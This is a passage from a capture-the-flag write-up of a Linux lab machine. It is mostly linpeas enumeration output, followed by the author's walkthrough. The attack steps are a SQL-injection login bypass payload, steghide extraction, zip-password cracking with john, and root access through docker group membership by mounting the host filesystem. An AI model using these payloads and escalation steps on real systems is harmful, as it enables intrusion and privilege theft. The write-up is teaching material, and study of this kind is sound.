-rw-r--r-- 1 root root 8304 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/tools/objtool/.elf.o.cmd
-rw-r--r-- 1 root root 217480 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/.config.old
-rw-r--r-- 1 root root 13903 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/kernel/.bounds.s.cmd
-rw-r--r-- 1 root root 217356 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/.config
-rw-r--r-- 1 root root 280 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/arch/x86/include/generated/uapi/asm/.unistd_64.h.cmd
-rw-r--r-- 1 root root 300 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/arch/x86/include/generated/uapi/asm/.unistd_x32.h.cmd
-rw-r--r-- 1 root root 275 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/arch/x86/include/generated/uapi/asm/.unistd_32.h.cmd
-rw-r--r-- 1 root root 252 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/arch/x86/include/generated/asm/.syscalls_64.h.cmd
-rw-r--r-- 1 root root 276 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/arch/x86/include/generated/asm/.unistd_64_x32.h.cmd
-rw-r--r-- 1 root root 252 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/arch/x86/include/generated/asm/.syscalls_32.h.cmd
-rw-r--r-- 1 root root 364 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/arch/x86/include/generated/asm/.xen-hypercalls.h.cmd
-rw-r--r-- 1 root root 280 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/arch/x86/include/generated/asm/.unistd_32_ia32.h.cmd
-rw-r--r-- 1 root root 155 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/arch/x86/purgatory/.kexec-purgatory.c.cmd
-rw-r--r-- 1 root root 1664 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/arch/x86/purgatory/.setup-x86_64.o.cmd
-rw-r--r-- 1 root root 1544 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/arch/x86/purgatory/.entry64.o.cmd
-rw-r--r-- 1 root root 11363 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/arch/x86/purgatory/.purgatory.o.cmd
-rw-r--r-- 1 root root 5848 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/arch/x86/purgatory/.string.o.cmd
-rw-r--r-- 1 root root 359 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/arch/x86/purgatory/.purgatory.ro.cmd
-rw-r--r-- 1 root root 7921 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/arch/x86/purgatory/.sha256.o.cmd
-rw-r--r-- 1 root root 1524 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/arch/x86/purgatory/.stack.o.cmd
-rw-r--r-- 1 root root 4624 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/arch/x86/tools/.relocs_common.o.cmd
-rw-r--r-- 1 root root 146 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/arch/x86/tools/.relocs.cmd
-rw-r--r-- 1 root root 4645 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/arch/x86/tools/.relocs_64.o.cmd
-rw-r--r-- 1 root root 4645 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/arch/x86/tools/.relocs_32.o.cmd
-rw-r--r-- 1 root root 60137 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/arch/x86/kernel/.asm-offsets.s.cmd
-rw-r--r-- 1 root root 5553 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/scripts/kconfig/.conf.o.cmd
-rw-r--r-- 1 root root 110 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/scripts/kconfig/.conf.cmd
-rw-r--r-- 1 root root 6321 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/scripts/kconfig/.zconf.tab.o.cmd
-rw-r--r-- 1 root root 4799 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/scripts/.recordmcount.cmd
-rw-r--r-- 1 root root 4535 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/scripts/.asn1_compiler.cmd
-rw-r--r-- 1 root root 4982 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/scripts/.sortextable.cmd
-rw-r--r-- 1 root root 5243 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/scripts/selinux/mdp/.mdp.cmd
-rw-r--r-- 1 root root 5742 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/scripts/selinux/genheaders/.genheaders.cmd
-rw-r--r-- 1 root root 7415 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/scripts/.sign-file.cmd
-rw-r--r-- 1 root root 3812 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/scripts/.kallsyms.cmd
-rw-r--r-- 1 root root 6421 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/scripts/.extract-cert.cmd
-rw-r--r-- 1 root root 3536 Sep 8 10:09 /usr/src/linux-headers-4.15.0-118-generic/scripts/.conmakehash.cmd
[+] Readable files inside /tmp, /var/tmp, /var/backups(limit 70)
-rw-r--r-- 1 root root 207 Oct 3 03:47 /var/backups/dpkg.statoverride.0
-rw-r--r-- 1 root root 572747 Oct 3 05:26 /var/backups/dpkg.status.0
-rw-r--r-- 1 root root 51200 Oct 3 06:25 /var/backups/alternatives.tar.0
-rw-r--r-- 1 root root 32630 Oct 3 06:29 /var/backups/apt.extended_states.0
-rw-r--r-- 1 root root 437 Oct 3 03:33 /var/backups/dpkg.diversions.0
[+] Interesting writable files owned by me or writable by everyone (not in Home)
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
/dev/mqueue
/dev/mqueue/linpeas.txt
/dev/shm
/home/apaar
/run/lock
/run/screen
/run/screen/S-apaar
/run/user/1001
/run/user/1001/gnupg
/run/user/1001/systemd
/srv/ftp/note.txt
/tmp
/tmp/.font-unix
/tmp/.ICE-unix
/tmp/.Test-unix
/tmp/tmux-1001
/tmp/.X11-unix
/tmp/.XIM-unix
/var/crash
/var/lib/lxcfs/cgroup/memory/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/accounts-daemon.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/acpid.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/amazon-ssm-agent.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/apache2.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/atd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/boot.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/containerd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/cron.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dbus.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-hugepages.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/dev-mqueue.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/docker.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/docker.socket/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lvm2-lvmetad.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lxcfs.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/lxd.socket/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/mysql.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/networkd-dispatcher.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/polkit.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/proc-sys-fs-binfmt_misc.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/rsyslog.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/snapd.seeded.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/snapd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/snapd.socket/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/ssh.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/sys-fs-fuse-connections.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-config.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/sys-kernel-debug.mount/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-journald.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-logind.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-networkd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-resolved.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-timesyncd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/systemd-udevd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/system-getty.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/system-lvm2\x2dpvscan.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/system-serial\x2dgetty.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/unattended-upgrades.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/uuidd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/system.slice/vsftpd.service/cgroup.event_control
/var/lib/lxcfs/cgroup/memory/user.slice/cgroup.event_control
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/cgroup.clone_children
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/cgroup.procs
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/dirmngr.service
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/dirmngr.service/cgroup.clone_children
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/dirmngr.service/cgroup.procs
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/dirmngr.service/notify_on_release
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/dirmngr.service/tasks
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/gpg-agent.service
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/gpg-agent.service/cgroup.clone_children
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/gpg-agent.service/cgroup.procs
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/gpg-agent.service/notify_on_release
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/gpg-agent.service/tasks
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/init.scope
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/init.scope/cgroup.clone_children
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/init.scope/cgroup.procs
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/init.scope/notify_on_release
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/init.scope/tasks
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/snapd.session-agent.service
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/snapd.session-agent.service/cgroup.clone_children
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/snapd.session-agent.service/cgroup.procs
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/snapd.session-agent.service/notify_on_release
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/snapd.session-agent.service/tasks
/var/lib/lxcfs/cgroup/name=systemd/user.slice/user-1001.slice/user@1001.service/tasks
/var/lib/php/sessions
/var/tmp
[+] Interesting GROUP writable files (not in Home)
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#writable-files
Group apaar:
/dev/mqueue/linpeas.txt
[+] Searching passwords in config PHP files
[+] Finding IPs inside logs (limit 70)
73 /var/log/dpkg.log:3.18.04.3
38 /var/log/dpkg.log:2.18.04.1
26 /var/log/dpkg.log:7.18.04.2
18 /var/log/dpkg.log:3.192.1.7
16 /var/log/dpkg.log:18.04.11.13
15 /var/log/dpkg.log:1.18.04.1
13 /var/log/dpkg.log:1.18.04.14
12 /var/log/cloud-init-output.log:192.168.184.2
11 /var/log/dpkg.log:2.18.04.3
9 /var/log/wtmp:192.168.184.129
8 /var/log/installer/subiquity-debug.log.2001:192.168.184.132
8 /var/log/installer/subiquity-debug.log:192.168.184.132
8 /var/log/dpkg.log:6.18.04.1
8 /var/log/dpkg.log:5.18.04.4
8 /var/log/cloud-init-output.log:255.255.255.255
8 /var/log/apt/history.log:3.18.04.3
6 /var/log/journal/798fcd76739440de8c586719da062c3f/user-1001@0005b0be892453a9-cac5d20782906e02.journal~:192.168.184.129
6 /var/log/cloud-init-output.log:192.168.184.132
4 /var/log/apt/history.log:2.18.04.1
3 /var/log/installer/subiquity-debug.log.2001:192.168.184.255
3 /var/log/installer/subiquity-debug.log:192.168.184.255
3 /var/log/apt/history.log:7.18.04.2
2 /var/log/journal/798fcd76739440de8c586719da062c3f/user-1001@0005b4f3f0e654a5-7b6fd04dd47e3774.journal~:192.168.184.129
2 /var/log/installer/installer-journal.txt:91.189.91.157
2 /var/log/installer/installer-journal.txt:192.168.184.2
2 /var/log/installer/installer-journal.txt:192.168.184.132
2 /var/log/cloud-init-output.log:172.30.16.1
2 /var/log/apt/history.log:18.04.11.13
2 /var/log/apt/history.log:1.18.04.1
1 /var/log/wtmp:10.9.5.198
1 /var/log/lastlog:192.168.184.129
1 /var/log/lastlog:10.9.5.198
1 /var/log/installer/subiquity-debug.log.2001:192.168.184.2
1 /var/log/installer/subiquity-debug.log.2001:127.255.255.255
1 /var/log/installer/subiquity-debug.log:192.168.184.2
1 /var/log/installer/subiquity-debug.log:127.255.255.255
1 /var/log/cloud-init-output.log:172.30.24.17
1 /var/log/cloud-init-output.log:10.10.128.82
1 /var/log/apt/history.log:6.18.04.1
1 /var/log/apt/history.log:5.18.04.4
1 /var/log/apt/history.log:3.192.1.7
1 /var/log/apt/history.log:2.18.04.3
1 /var/log/apt/history.log:1.18.04.14
[+] Finding passwords inside logs (limit 70)
Binary file /var/log/cloud-init.log matches
Binary file /var/log/journal/798fcd76739440de8c586719da062c3f/user-1001@0005b0be892453a9-cac5d20782906e02.journal~ matches
Binary file /var/log/journal/798fcd76739440de8c586719da062c3f/user-1001.journal matches
/var/log/bootstrap.log: base-passwd depends on libc6 (>= 2.8); however:
/var/log/bootstrap.log: base-passwd depends on libdebconfclient0 (>= 0.145); however:
/var/log/bootstrap.log:dpkg: base-passwd: dependency problems, but configuring anyway as you requested:
/var/log/bootstrap.log:Preparing to unpack .../base-passwd_3.5.44_amd64.deb ...
/var/log/bootstrap.log:Preparing to unpack .../passwd_1%3a4.5-1ubuntu1_amd64.deb ...
/var/log/bootstrap.log:Selecting previously unselected package base-passwd.
/var/log/bootstrap.log:Selecting previously unselected package passwd.
/var/log/bootstrap.log:Setting up base-passwd (3.5.44) ...
/var/log/bootstrap.log:Setting up passwd (1:4.5-1ubuntu1) ...
/var/log/bootstrap.log:Shadow passwords are now on.
/var/log/bootstrap.log:Unpacking base-passwd (3.5.44) ...
/var/log/bootstrap.log:Unpacking base-passwd (3.5.44) over (3.5.44) ...
/var/log/bootstrap.log:Unpacking passwd (1:4.5-1ubuntu1) ...
/var/log/cloud-init.log:2020-10-03 03:40:15,106 - ssh_util.py[DEBUG]: line 123: option PasswordAuthentication added with yes
/var/log/cloud-init.log:2020-10-03 03:40:15,153 - cc_set_passwords.py[DEBUG]: Restarted the SSH daemon.
/var/log/cloud-init.log:2020-10-03 06:40:39,249 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance)
/var/log/cloud-init.log:2020-10-04 07:15:49,826 - helpers.py[DEBUG]: config-set-passwords already ran (freq=once-per-instance)
/var/log/dpkg.log:2020-08-06 22:35:30 install base-passwd:amd64 <none> 3.5.44
/var/log/dpkg.log:2020-08-06 22:35:30 status half-installed base-passwd:amd64 3.5.44
/var/log/dpkg.log:2020-08-06 22:35:31 configure base-passwd:amd64 3.5.44 3.5.44
/var/log/dpkg.log:2020-08-06 22:35:31 status half-configured base-passwd:amd64 3.5.44
/var/log/dpkg.log:2020-08-06 22:35:31 status unpacked base-passwd:amd64 3.5.44
/var/log/dpkg.log:2020-08-06 22:35:32 status installed base-passwd:amd64 3.5.44
/var/log/dpkg.log:2020-08-06 22:35:38 status half-configured base-passwd:amd64 3.5.44
/var/log/dpkg.log:2020-08-06 22:35:38 status half-installed base-passwd:amd64 3.5.44
/var/log/dpkg.log:2020-08-06 22:35:38 status unpacked base-passwd:amd64 3.5.44
/var/log/dpkg.log:2020-08-06 22:35:38 upgrade base-passwd:amd64 3.5.44 3.5.44
/var/log/dpkg.log:2020-08-06 22:35:44 install passwd:amd64 <none> 1:4.5-1ubuntu1
/var/log/dpkg.log:2020-08-06 22:35:44 status half-installed passwd:amd64 1:4.5-1ubuntu1
/var/log/dpkg.log:2020-08-06 22:35:44 status unpacked passwd:amd64 1:4.5-1ubuntu1
/var/log/dpkg.log:2020-08-06 22:35:45 configure base-passwd:amd64 3.5.44 <none>
/var/log/dpkg.log:2020-08-06 22:35:45 status half-configured base-passwd:amd64 3.5.44
/var/log/dpkg.log:2020-08-06 22:35:45 status installed base-passwd:amd64 3.5.44
/var/log/dpkg.log:2020-08-06 22:35:45 status unpacked base-passwd:amd64 3.5.44
/var/log/dpkg.log:2020-08-06 22:35:46 configure passwd:amd64 1:4.5-1ubuntu1 <none>
/var/log/dpkg.log:2020-08-06 22:35:46 status half-configured passwd:amd64 1:4.5-1ubuntu1
/var/log/dpkg.log:2020-08-06 22:35:46 status installed passwd:amd64 1:4.5-1ubuntu1
/var/log/dpkg.log:2020-08-06 22:35:46 status unpacked passwd:amd64 1:4.5-1ubuntu1
/var/log/dpkg.log:2020-08-06 22:37:45 configure passwd:amd64 1:4.5-1ubuntu2 <none>
/var/log/dpkg.log:2020-08-06 22:37:45 status half-configured passwd:amd64 1:4.5-1ubuntu1
/var/log/dpkg.log:2020-08-06 22:37:45 status half-configured passwd:amd64 1:4.5-1ubuntu2
/var/log/dpkg.log:2020-08-06 22:37:45 status half-installed passwd:amd64 1:4.5-1ubuntu1
/var/log/dpkg.log:2020-08-06 22:37:45 status installed passwd:amd64 1:4.5-1ubuntu2
/var/log/dpkg.log:2020-08-06 22:37:45 status unpacked passwd:amd64 1:4.5-1ubuntu1
/var/log/dpkg.log:2020-08-06 22:37:45 status unpacked passwd:amd64 1:4.5-1ubuntu2
/var/log/dpkg.log:2020-08-06 22:37:45 upgrade passwd:amd64 1:4.5-1ubuntu1 1:4.5-1ubuntu2
/var/log/installer/installer-journal.txt:Oct 03 03:34:06 ubuntu-server chage[14719]: changed password expiry for sshd
/var/log/installer/installer-journal.txt:Oct 03 03:34:06 ubuntu-server usermod[14714]: change user 'sshd' password
/var/log/installer/installer-journal.txt:Oct 03 09:16:01 ubuntu-server systemd[1]: Started Forward Password Requests to Wall Directory Watch.
[+] Finding emails inside logs (limit 70)
2 /var/log/bootstrap.log:ftpmaster@ubuntu.com
1 /var/log/installer/installer-journal.txt:dm-devel@redhat.com
[+] Finding *password* or *credential* files in home (limit 70)
[+] Finding 'pwd' or 'passw' variables inside /home /var/www /var/backups /tmp /etc /root /mnt (limit 70)
/etc/bash_completion.d/grub:__grub_mkpasswd_pbkdf2_program="grub-mkpasswd-pbkdf2"
/etc/cloud/cloud.cfg: lock_passwd: True
/etc/cloud/cloud.cfg: sudo: ["ALL=(ALL) NOPASSWD:ALL"]
/etc/nsswitch.conf:passwd: compat systemd
/etc/pam.d/common-password:password [success=1 default=ignore] pam_unix.so obscure sha512
/etc/php/7.2/apache2/php.ini:; Define the anonymous ftp password (your email address). PHP's default setting
/etc/php/7.2/cli/php.ini:; Define the anonymous ftp password (your email address). PHP's default setting
/etc/security/namespace.init: gid=$(echo "$passwd" | cut -f4 -d":")
/etc/security/namespace.init: homedir=$(echo "$passwd" | cut -f6 -d":")
/etc/security/namespace.init: passwd=$(getent passwd "$user")
/etc/ssl/openssl.cnf:challengePassword = A challenge password
/etc/ssl/openssl.cnf:challengePassword_max = 20
/etc/ssl/openssl.cnf:challengePassword_min = 4
/etc/vmware-tools/vm-support: sed 's/password[[:space:]]\+\(.*\)[[:space:]]\+\(.*\)$/password \1 xxxxxx/g' > \
/home/apaar/linpeas.sh: echo " You can login as $USER using password: $PASSWORDTRY" | sed "s,.*,${C}[1;31;103m&${C}[0m,"
/home/apaar/linpeas.sh: FIND_PASSWORD_RELEVANT_NAMES=$(prep_to_find "$PASSWORD_RELEVANT_NAMES")
/home/apaar/linpeas.sh: for f in $tomcat; do grep "username=" "$f" 2>/dev/null | grep "password=" | sed "s,.*,${C}[1;31m&${C}[0m,"; done
/home/apaar/linpeas.sh: PASSWORD_RELEVANT_NAMES="*password* *credential* creds*"
/home/apaar/linpeas.sh: PASSWORDTRY=$2
/home/apaar/linpeas.sh: SHELLUSERS=`cat /etc/passwd 2>/dev/null | grep -i "sh$" | cut -d ":" -f 1`
/home/apaar/log: (apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh
/home/apaar/log: lock_passwd: True
/home/apaar/log: sudo: ["ALL=(ALL) NOPASSWD:ALL"]
/var/backups/dpkg.status.0:Depends: passwd, debconf (>= 0.5) | debconf-2.0
/var/www/files/account.php: $query = $this->con->prepare("SELECT * FROM users WHERE username='$un' AND password='$pw'");
/var/www/files/index.php: <input type="password" name="password" id="password" placeholder="Password" required>
/var/www/files/index.php: $password = $_POST['password'];
[+] Finding possible password variables inside /home /var/www /var/backups /tmp /etc /root /mnt (limit 70)
[+] Finding 'username' string inside /home /var/www /var/backups /tmp /etc /root /mnt (limit 70)
/home/apaar/linpeas.sh: for f in $tomcat; do grep "username=" "$f" 2>/dev/null | grep "password=" | sed "s,.*,${C}[1;31m&${C}[0m,"; done
/home/apaar/log:/var/www/files/account.php: $query = $this->con->prepare("SELECT * FROM users WHERE username='$un' AND password='$pw'");
/var/www/files/account.php: $query = $this->con->prepare("SELECT * FROM users WHERE username='$un' AND password='$pw'");
/var/www/files/index.php: <input type="text" name="username" id="username" placeholder="Username" required>
/var/www/files/index.php: $username = $_POST['username'];
[+] Looking for specific hashes inside files - less false positives (limit 70)
Looking through the results...
[+] Useful software
/bin/nc
/bin/netcat
/usr/bin/wget
/usr/bin/curl
/bin/ping
/usr/bin/base64
/usr/bin/python3
/usr/bin/python3.6
/usr/bin/perl
/usr/bin/php
/usr/bin/sudo
/usr/bin/docker
[+] Installed Compiler
/usr/share/gcc-8
[+] Active Ports
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#internal-open-ports
Active Internet connections (servers and established)
Proto Recv-Q Send-Q Local Address Foreign Address State PID/Program name
tcp 0 0 127.0.0.1:9001 0.0.0.0:* LISTEN -
uid=1000(aurick) gid=1000(aurick) groups=1000(aurick),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),108(lxd)
uid=1001(apaar) gid=1001(apaar) groups=1001(apaar)
uid=1002(manurodh) gid=1002(manurodh) groups=1002(manurodh),999(docker)
[+] SUID - Check easy privesc, exploits and write perms
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands
/usr/lib/openssh/ssh-keysign
/usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
/usr/lib/snapd/snap-confine
/usr/lib/policykit-1/polkit-agent-helper-1
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/bin/sudo ---> /sudo$
/usr/bin/newgidmap
/usr/bin/gpasswd
/usr/bin/newuidmap
/usr/bin/traceroute6.iputils
/usr/bin/newgrp ---> HP-UX_10.20
/usr/bin/pkexec ---> Linux4.10_to_5.1.17(CVE-2019-13272)/rhel_6(CVE-2011-1485)
/usr/bin/passwd ---> Apple_Mac_OSX(03-2006)/Solaris_8/9(12-2004)/SPARC_8/9/Sun_Solaris_2.3_to_2.5.1(02-1997)
/usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
/usr/bin/chfn ---> SuSE_9.3/10
/usr/bin/chsh
/bin/su
/bin/mount ---> Apple_Mac_OSX(Lion)_Kernel_xnu-1699.32.7_except_xnu-1699.24.8
/bin/fusermount
/bin/ping
/bin/umount ---> BSD/Linux(08-1996)
[+] SGID
[i] https://book.hacktricks.xyz/linux-unix/privilege-escalation#commands-with-sudo-and-suid-commands
/usr/lib/x86_64-linux-gnu/utempter/utempter
/usr/bin/bsd-write
/usr/bin/wall
/usr/bin/expiry
/usr/bin/ssh-agent
/usr/bin/mlocate
/usr/bin/at ---> RTru64_UNIX_4.0g(CVE-2002-1614)
/usr/bin/crontab
/usr/bin/chage
/sbin/unix_chkpwd
/sbin/pam_extrausers_chkpwd
9001 - http
Ok we see there is a another server running on 127.0.0.1:9001
which means we need to use ssh
to port forward from local host the server.
We can use sql injection to bypass this
' or 1=1 -- -
Success, we are in .......
Taking a punt I download the hacker jpg file and run steghide
$ wget http://127.0.0.1:9001/images/hacker-with-laptop_23-2147985341.jpg
--2020-11-28 00:42:04-- http://127.0.0.1:9001/images/hacker-with-laptop_23-2147985341.jpg
Connecting to 127.0.0.1:9001... connected.
HTTP request sent, awaiting response... 200 OK
Length: 68841 (67K) [image/jpeg]
Saving to: ‘hacker-with-laptop_23-2147985341.jpg’
hacker-with-laptop_23-214798534 100%[====================================================>] 67.23K --.-KB/s in 0.03s
2020-11-28 00:42:05 (2.14 MB/s) - ‘hacker-with-laptop_23-2147985341.jpg’ saved [68841/68841]
$ steghide extract -sf hacker-with-laptop_23-2147985341.jpg
Enter passphrase:
wrote extracted data to "backup.zip".
$ unzip backup.zip
Archive: backup.zip
[backup.zip] source_code.php password:
skipping: source_code.php incorrect password
Unfortunately we need a password for backup.zip
so lets breakout john
$ /usr/sbin/zip2john backup.zip > hash
ver 2.0 efh 5455 efh 7875 backup.zip/source_code.php PKZIP Encr: 2b chk, TS_chk, cmplen=554, decmplen=1211, crc=69DC82F3
$ john hash -w=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
[REDACTED] (backup.zip/source_code.php)
1g 0:00:00:00 DONE (2020-11-28 00:46) 50.00g/s 819200p/s 819200c/s 819200C/s total90..cocoliso
Use the "--show" option to display all of the cracked passwords reliably
Session completed
$ unzip backup.zip
Archive: backup.zip
[backup.zip] source_code.php password:
inflating: source_code.php
Looking through the source code we see
$email = $_POST["email"];
$password = $_POST["password"];
if(base64_encode($password) == "[REDCACTED]")
{
$random = rand(1000,9999);?><br><br><br>
<form method="POST">
This gives us a base64 encode password we can decode. Using this password we can become anurodh
apaar@ubuntu:~$ su - anurodh
Password:
anurodh@ubuntu:~$
Now that we anurodh
we can check the groups we are in
anurodh@ubuntu:/home$ id
uid=1002(anurodh) gid=1002(anurodh) groups=1002(anurodh),999(docker)
As we are in docker
this should give us a way to escalte
anurodh@ubuntu:/home$ docker run -v /:/mnt --rm -it alpine /bin/sh
/ # cd /mnt/root
/mnt/root # ls
proof.txt
/mnt/root # cat proof.txt
[REDACTED]
Congratulations! You have successfully completed the challenge.
,-.-. ,----. _,.---._ .-._ ,----.
,-..-.-./ \==\ ,-.--` , \ _.-. _.-. _,..---._ ,-.' , - `. /==/ \ .-._ ,-.--` , \
|, \=/\=|- |==||==|- _.-` .-,.'| .-,.'| /==/, - \ /==/_, , - \|==|, \/ /, /==|- _.-`
|- |/ |/ , /==/|==| `.-.|==|, | |==|, | |==| _ _\==| .=. |==|- \| ||==| `.-.
\, , _|==/==/_ , /|==|- | |==|- | |==| .=. |==|_ : ;=: - |==| , | -/==/_ , /
| - - , |==|==| .-' |==|, | |==|, | |==|,| | -|==| , '=' |==| - _ |==| .-'
\ , - /==/|==|_ ,`-._|==|- `-._|==|- `-._ |==| '=' /\==\ - ,_ /|==| /\ , |==|_ ,`-._
|- /\ /==/ /==/ , //==/ - , ,/==/ - , ,/ |==|-, _`/ '.='. - .' /==/, | |- /==/ , /
`--` `--` `--`-----`` `--`-----'`--`-----' `-.`.____.' `--`--'' `--`./ `--`--`-----``
--------------------------------------------Designed By -------------------------------------------------------
| Anurodh Acharya |
---------------------
Let me know if you liked it.
Twitter
- @acharya_anurodh
Linkedin
- www.linkedin.com/in/anurodh-acharya-b1937116a
/mnt/root #